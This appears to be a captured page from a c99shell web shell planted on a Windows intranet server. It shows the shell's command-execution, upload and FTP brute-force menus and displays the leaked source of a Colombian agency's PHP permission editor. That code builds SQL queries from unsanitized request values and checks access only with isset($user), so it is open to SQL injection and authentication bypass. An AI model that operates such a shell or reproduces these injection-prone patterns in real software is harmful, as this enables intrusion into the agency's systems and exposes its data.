!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\phpscripts\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     syseditor2.php (7.59 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$sed 
= isset($user);
if (
$sed == false) {
exit;
}else{

require(
'conexion2.php');
$stmt Ociparse($c1" SELECT EU_USERNAME FROM envista.env_users where EU_USERNAME='$user'");
$result OCIExecute($stmt);
if (
$result == false) {
exit;
}else{
$cont 0;
while (
OCIFetchInto($stmt$value1)) {
foreach (
$value1 as $val1)
{
$cont++;
}}
if (
$cont == 1) {
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Administrador General de Aplicaciones (Web-SIA)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
a {
    color: #0099CC;
    font-size: 11px;
    text-decoration: none;
}
a:hover {
    color: #0099CC;
    font-size: 11px;
    text-decoration: underline;
}
input {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 12px;
    color: #666666;
    background-color: #F0F0F0;
}
select {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 11px;
    color: #666666;
    background-color: #F0F0F0;
}
-->
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}

function MM_findObj(n, d) { //v4.0
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && document.getElementById) x=document.getElementById(n); return x;
}

function MM_jumpMenuGo(selName,targ,restore){ //v3.0
  var selObj = MM_findObj(selName); if (selObj) MM_jumpMenu(targ,selObj,restore);
}
//-->
</script>
</head>
<?php
$axn 
= isset($acc);
if (
$axn == true) {
if (
$acc == 1) {
include(
'conect/conect.php');
$query ="INSERT INTO perms VALUES('','$user1','$aply')";
$result mysql_query($query,$db);
}
if (
$acc == 2) {
include(
'conect/conect.php');
$query ="DELETE FROM perms WHERE id=$id";
$result mysql_query($query,$db);
}
}
?>
<body topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td><div align="center"><img src="admon.gif" width="545" height="142"></div></td>
  </tr>
  <tr>
    <td><table width="100%" border="1" cellpadding="5" cellspacing="0" bordercolor="#FFFFFF">
        <tr>
          <td width="33%">&nbsp;</td>
          <td width="34%" bordercolor="#CCCCCC">
          <form name="form1" method="post" action="requiresys22.php">
              <table width="100%" border="1" cellpadding="5" cellspacing="0" bordercolor="#FFFFFF">
                <tr> 
                  <td colspan="2" bgcolor="#CCCCCC"><div align="center"><font color="#999999" size="2" face="Verdana, Arial, Helvetica, sans-serif">Usuario: 
                      <strong> <font color="#666666">Administrador</font></strong></font></div></td>
                </tr>
                <tr> 
                  <td colspan="2"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Editor 
                      de permisos y restricciones para la edici&oacute;n de contenidos 
                      en Site-DAMA</strong></font></div></td>
                </tr>
                <tr bgcolor="#F0F0F0"> 
                  <td colspan="2"> <div align="right"></div>
                    <strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">1-)</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
                    Otorgar permisos</font> </td>
                </tr>
                <tr> 
                  <td width="20%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Usuario:</font></div></td>
                  <td width="80%"><select name="user1" id="user1">
                      <?php
                  
require('conexion2.php');
                  
$stmt Ociparse($c1" SELECT EU_USERNAME FROM envista.env_users");
                  echo 
$c1;
$result OCIExecute($stmt);
if (
$result == false) {
echo 
OCIError($stmt);
}else{
while (
OCIFetchInto($stmt$value1)) {
foreach (
$value1 as $val1)
{
$usrx $val1;
echo 
"<option value=\"$usrx\">$usrx</option>";
}}}
$c2 OciLogoff($c1);
                      
                      
                
?>
                    </select> </td>
                </tr>
                <tr> 
                  <td><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Aplicaci&oacute;n:</font></div></td>
                  <td><select name="aply" id="aply">
                      <?php
                     
include('conect/conect.php');
                    
$consul "SELECT *
                    FROM cate where length(tema_id) < 5 and length(tema_id) > 3"
;
                    
$result mysql_query($consul,$db);
                    
$num_filas mysql_num_rows($result);
                    while (
$myrow mysql_fetch_array($result))
                    {
                    
$idapli $myrow["id"];
                    
$nameapli $myrow["tema_desc"];
                    echo 
"<option value=\"$idapli\">$nameapli</option>";
                      }
                      
?>
                    </select> </td>
                </tr>
                <tr bgcolor="#FFFFFF"> 
                  <td colspan="2"><div align="center"> 
                      <input type="submit" name="Submit2" value="Crear el permiso... ">
                      <input name="acc" type="hidden" id="acc2" value="1">
                      <input name="user" type="hidden" id="acc" value="<?php echo $user ?>">
                    </div></td>
                </tr>
                <tr bgcolor="#F0F0F0"> 
                  <td colspan="2"> <div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>2-)</strong> 
                      Denegar</font></div></td>
                </tr>
                <tr> 
                  <td colspan="2"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Permiso:</font></td>
                </tr>
                <tr> 
                  <td colspan="2"> <div align="right"></div>
                    <select name="menu1">
                      <?php
                    
include('conect/conect.php');
                    
$consul "SELECT *
                    FROM perms order by usr"
;
                    
$result mysql_query($consul,$db);
                    
$num_filas mysql_num_rows($result);
                    while (
$myrow mysql_fetch_array($result))
                    {
                    
$idx $myrow["id"];
                    
$uuser $myrow["usr"];
                    
$aaply $myrow["id_apl"];
                    
$consula "SELECT *
                    FROM cate where id=
$aaply";
                    
$resulta mysql_query($consula,$db);
                    
$num_filasa mysql_num_rows($resulta);
                    while (
$myrowa mysql_fetch_array($resulta))
                    {
                    
$nnombre $myrowa["tema_desc"];
                    }
                    
$ban $uuser "/" $nnombre;
                    echo 
"<option value=\"requiresys22.php?id=$idx&acc=2&user=$user\">$ban</option>";
                      }
                      
                      
?>
                    </select> <input type="button" name="Submit" value="Ok"  onClick="MM_jumpMenuGo('menu1','parent',0)"></td>
                </tr>
              </table>
            </form>
          </td>
          <td width="33%">&nbsp;</td>
        </tr>
      </table></td>
  </tr>
  <tr>
    <td><div align="center"><font color="#FFFFFF" size="1" face="Verdana, Arial, Helvetica, sans-serif">-----------</font><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><br>
        Cont&aacute;ctenos en: <a href="mailto:sistemas@dama.gov.co">sistemas@dama.gov.co</a><br>
        &copy; Todos los Derechos Reservados para el DAMA<br>
        Bogot&aacute;, Colombia. 2003</font></div></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>
<?php
}}
$c2 OciLogoff($c1);
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--